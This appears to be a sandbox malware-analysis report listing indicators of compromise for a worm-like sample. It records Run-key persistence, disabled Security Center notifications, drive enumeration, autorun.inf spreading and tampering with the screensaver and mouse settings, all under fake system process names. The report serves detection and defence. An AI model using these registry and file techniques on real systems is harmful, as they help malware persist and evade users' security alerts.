\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" SERVICES.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ LSASS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" SMSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" CSRSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ SERVICES.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" LSASS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" SERVICES.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" LSASS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ CSRSS.EXE -
Adds Run key to start application 2 TTPs 45 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Black Hole = "C:\\Windows\\Black Hole.exe" SMSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LogonAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE" Lubang Hitam.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Black Hole = "C:\\Windows\\Black Hole.exe" WINLOGON.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Black Hole = "C:\\Windows\\Black Hole.exe" CSRSS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Black Hole = "C:\\Windows\\Black Hole.exe" LSASS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSMSGS = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE" LSASS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Black Hole = "C:\\Windows\\Black Hole.exe" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServiceAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE" Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LogonAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE" WINLOGON.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System Monitoring = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE" SERVICES.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSMSGS = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE" Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System Monitoring = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE" SMSS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Black Hole = "C:\\Windows\\Black Hole.exe" Black Hole.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSMSGS = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System Monitoring = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServiceAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE" WINLOGON.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System Monitoring = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE" CSRSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LogonAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE" LSASS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServiceAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LogonAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServiceAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE" Lubang Hitam.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System Monitoring = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE" LSASS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Black Hole = "C:\\Windows\\Black Hole.exe" Lubang Hitam.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSMSGS = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE" WINLOGON.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServiceAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE" CSRSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System Monitoring = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE" Black Hole.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServiceAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE" SERVICES.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LogonAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE" Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LogonAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE" CSRSS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSMSGS = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE" SERVICES.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LogonAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE" SERVICES.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSMSGS = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE" Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LogonAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE" Black Hole.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSMSGS = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE" Lubang Hitam.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System Monitoring = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE" WINLOGON.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSMSGS = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE" CSRSS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServiceAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE" LSASS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServiceAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE" Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System Monitoring = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE" Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LogonAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE" SMSS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Black Hole = "C:\\Windows\\Black Hole.exe" Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System Monitoring = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE" Lubang Hitam.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Black Hole = "C:\\Windows\\Black Hole.exe" SERVICES.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSMSGS = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE" SMSS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServiceAdmin = "C:\\Users\\Admin\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE" SMSS.EXE -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: WINLOGON.EXE File opened (read-only) \??\K: CSRSS.EXE File opened (read-only) \??\V: LSASS.EXE File opened (read-only) \??\W: LSASS.EXE File opened (read-only) \??\W: SMSS.EXE File opened (read-only) \??\U: Lubang Hitam.exe File opened (read-only) \??\W: Lubang Hitam.exe File opened (read-only) \??\J: CSRSS.EXE File opened (read-only) \??\Q: CSRSS.EXE File opened (read-only) \??\L: SMSS.EXE File opened (read-only) \??\N: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened (read-only) \??\T: WINLOGON.EXE File opened (read-only) \??\V: SERVICES.EXE File opened (read-only) \??\G: SMSS.EXE File opened (read-only) \??\I: LSASS.EXE File opened (read-only) \??\R: SMSS.EXE File opened (read-only) \??\H: Black Hole.exe File opened (read-only) \??\M: Black Hole.exe File opened (read-only) \??\Q: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened (read-only) \??\U: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened (read-only) \??\H: CSRSS.EXE File opened (read-only) \??\E: LSASS.EXE File opened (read-only) \??\W: SERVICES.EXE File opened (read-only) \??\Z: Black Hole.exe File opened (read-only) \??\G: WINLOGON.EXE File opened (read-only) \??\U: CSRSS.EXE File opened (read-only) \??\Z: SERVICES.EXE File opened (read-only) \??\Y: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened (read-only) \??\T: SMSS.EXE File opened (read-only) \??\P: Black Hole.exe File opened (read-only) \??\O: SERVICES.EXE File opened (read-only) \??\I: SMSS.EXE File opened (read-only) \??\U: WINLOGON.EXE File opened (read-only) \??\G: CSRSS.EXE File opened (read-only) \??\Y: CSRSS.EXE File opened (read-only) \??\K: SERVICES.EXE File opened (read-only) \??\Z: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened (read-only) \??\X: SMSS.EXE File opened (read-only) \??\G: Black Hole.exe File opened (read-only) \??\V: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened (read-only) \??\W: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened (read-only) \??\K: WINLOGON.EXE File opened (read-only) \??\R: CSRSS.EXE File opened (read-only) \??\J: SERVICES.EXE File opened (read-only) \??\G: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened (read-only) \??\B: WINLOGON.EXE File opened (read-only) \??\N: WINLOGON.EXE File opened (read-only) \??\N: CSRSS.EXE File opened (read-only) \??\L: LSASS.EXE File opened (read-only) \??\O: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened (read-only) \??\L: Lubang Hitam.exe File opened (read-only) \??\X: Lubang Hitam.exe File opened (read-only) \??\N: SERVICES.EXE File opened (read-only) \??\M: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened (read-only) \??\V: Lubang Hitam.exe File opened (read-only) \??\S: CSRSS.EXE File opened (read-only) \??\P: SERVICES.EXE File opened (read-only) \??\H: WINLOGON.EXE File opened (read-only) \??\P: LSASS.EXE File opened (read-only) \??\Z: SMSS.EXE File opened (read-only) \??\U: Black Hole.exe File opened (read-only) \??\H: d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened (read-only) \??\K: Lubang Hitam.exe File opened (read-only) \??\O: Lubang Hitam.exe -
Drops autorun.inf file 1 TTPs 8 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File opened for modification C:\Autorun.inf d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File created F:\Autorun.inf d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened for modification F:\Autorun.inf d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File created F:\Autorun.inf Lubang Hitam.exe File opened for modification F:\Autorun.inf Lubang Hitam.exe File created F:\Autorun.inf WINLOGON.EXE File opened for modification F:\Autorun.inf WINLOGON.EXE File created C:\Autorun.inf d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe -
Drops file in System32 directory 50 IoCs
description ioc Process File created C:\Windows\SysWOW64\Shell.exe d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File created C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe File created C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\Windows\SysWOW64\Lubang Hitam.exe d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened for modification C:\Windows\SysWOW64\Destruction.scr SERVICES.EXE File opened for modification C:\Windows\SysWOW64\Shell.exe Black Hole.exe File opened for modification C:\Windows\SysWOW64\Destruction.scr d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File created C:\Windows\SysWOW64\Lubang Hitam.exe Lubang Hitam.exe File created C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\Windows\SysWOW64\Lubang Hitam.exe Black Hole.exe File opened for modification C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe File created C:\Windows\SysWOW64\Lubang Hitam.exe CSRSS.EXE File opened for modification C:\Windows\SysWOW64\Lubang Hitam.exe WINLOGON.EXE File opened for modification C:\Windows\SysWOW64\Lubang Hitam.exe CSRSS.EXE File opened for modification C:\Windows\SysWOW64\Destruction.scr WINLOGON.EXE File created C:\Windows\SysWOW64\Lubang Hitam.exe SERVICES.EXE File opened for modification C:\Windows\SysWOW64\Lubang Hitam.exe SERVICES.EXE File opened for modification C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe File created C:\Windows\SysWOW64\Lubang Hitam.exe d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File created C:\Windows\SysWOW64\Lubang Hitam.exe LSASS.EXE File opened for modification C:\Windows\SysWOW64\Shell.exe WINLOGON.EXE File opened for modification C:\Windows\SysWOW64\Destruction.scr CSRSS.EXE File created C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe File created C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe File created C:\Windows\SysWOW64\Lubang Hitam.exe SMSS.EXE File opened for modification C:\Windows\SysWOW64\Lubang Hitam.exe SMSS.EXE File created C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\Windows\SysWOW64\Shell.exe SMSS.EXE File opened for modification C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe File created C:\Windows\SysWOW64\Lubang Hitam.exe Black Hole.exe File created C:\Windows\SysWOW64\Lubang Hitam.exe WINLOGON.EXE File opened for modification C:\Windows\SysWOW64\Shell.exe SERVICES.EXE File opened for modification C:\Windows\SysWOW64\Destruction.scr SMSS.EXE File opened for modification C:\Windows\SysWOW64\Destruction.scr Lubang Hitam.exe File opened for modification C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\Windows\SysWOW64\Destruction.scr Black Hole.exe File created C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe File created C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe File created C:\Windows\SysWOW64\Destruction.scr d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened for modification C:\Windows\SysWOW64\Shell.exe LSASS.EXE File opened for modification C:\Windows\SysWOW64\Lubang Hitam.exe LSASS.EXE File opened for modification C:\Windows\SysWOW64\Shell.exe d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened for modification C:\Windows\SysWOW64\Shell.exe Lubang Hitam.exe File opened for modification C:\Windows\SysWOW64\Shell.exe CSRSS.EXE File opened for modification C:\Windows\SysWOW64\Lubang Hitam.exe Lubang Hitam.exe File opened for modification C:\Windows\SysWOW64\Destruction.scr LSASS.EXE File opened for modification C:\Windows\SysWOW64\msvbvm60.dll Lubang Hitam.exe -
Drops file in Windows directory 45 IoCs
description ioc Process File opened for modification C:\Windows\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\Windows\Black Hole.exe LSASS.EXE File opened for modification C:\WINDOWS\Black Hole.txt Lubang Hitam.exe File opened for modification C:\WINDOWS\Hacked By Gerry.txt Lubang Hitam.exe File opened for modification C:\WINDOWS\Black Hole.txt WINLOGON.EXE File created C:\Windows\msvbvm60.dll Lubang Hitam.exe File created C:\Windows\Black Hole.exe Black Hole.exe File created C:\Windows\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\Windows\Black Hole.exe d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened for modification C:\WINDOWS\Black Hole.txt d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened for modification C:\Windows\Black Hole.exe Lubang Hitam.exe File opened for modification C:\WINDOWS\Black Hole.txt CSRSS.EXE File opened for modification C:\WINDOWS\Black Hole.txt SERVICES.EXE File opened for modification C:\Windows\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\WINDOWS\Black Hole.txt SMSS.EXE File created C:\WINDOWS\Black Hole.txt d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File created C:\Windows\msvbvm60.dll Lubang Hitam.exe File created C:\Windows\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\Windows\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\Windows\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\WINDOWS\Hacked By Gerry.txt LSASS.EXE File opened for modification C:\Windows\msvbvm60.dll Lubang Hitam.exe File created C:\Windows\Black Hole.exe d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened for modification C:\Windows\Black Hole.exe SMSS.EXE File created C:\Windows\Black Hole.exe SMSS.EXE File opened for modification C:\Windows\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\WINDOWS\Black Hole.txt LSASS.EXE File opened for modification C:\Windows\msvbvm60.dll Lubang Hitam.exe File created C:\WINDOWS\Hacked By Gerry.txt d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File opened for modification C:\Windows\Black Hole.exe WINLOGON.EXE File opened for modification C:\Windows\Black Hole.exe CSRSS.EXE File opened for modification C:\Windows\Black Hole.exe SERVICES.EXE File created C:\Windows\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\Windows\Black Hole.exe Black Hole.exe File opened for modification C:\WINDOWS\Black Hole.txt Black Hole.exe File opened for modification C:\WINDOWS\Hacked By Gerry.txt Black Hole.exe File opened for modification C:\WINDOWS\Hacked By Gerry.txt WINLOGON.EXE File opened for modification C:\WINDOWS\Hacked By Gerry.txt CSRSS.EXE File opened for modification C:\WINDOWS\Hacked By Gerry.txt SERVICES.EXE File opened for modification C:\WINDOWS\Hacked By Gerry.txt SMSS.EXE File created C:\Windows\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\WINDOWS\Hacked By Gerry.txt d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe File created C:\Windows\msvbvm60.dll Lubang Hitam.exe File created C:\Windows\msvbvm60.dll Lubang Hitam.exe File opened for modification C:\Windows\msvbvm60.dll Lubang Hitam.exe -
Modifies Control Panel 54 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\ Black Hole.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\DESTRU~1.SCR" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\ WINLOGON.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ SERVICES.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ LSASS.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\ SMSS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaveTimeOut = "600" WINLOGON.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\DESTRU~1.SCR" CSRSS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaveTimeOut = "600" LSASS.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\ LSASS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaveTimeOut = "600" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\ Black Hole.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ Lubang Hitam.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\DESTRU~1.SCR" Lubang Hitam.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\SwapMouseButtons = "1" CSRSS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\DESTRU~1.SCR" Black Hole.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\ Lubang Hitam.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ WINLOGON.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0" CSRSS.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ SMSS.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\SwapMouseButtons = "1" SMSS.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ Black Hole.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\SwapMouseButtons = "1" Black Hole.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ Black Hole.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaveTimeOut = "600" Black Hole.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0" SERVICES.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0" 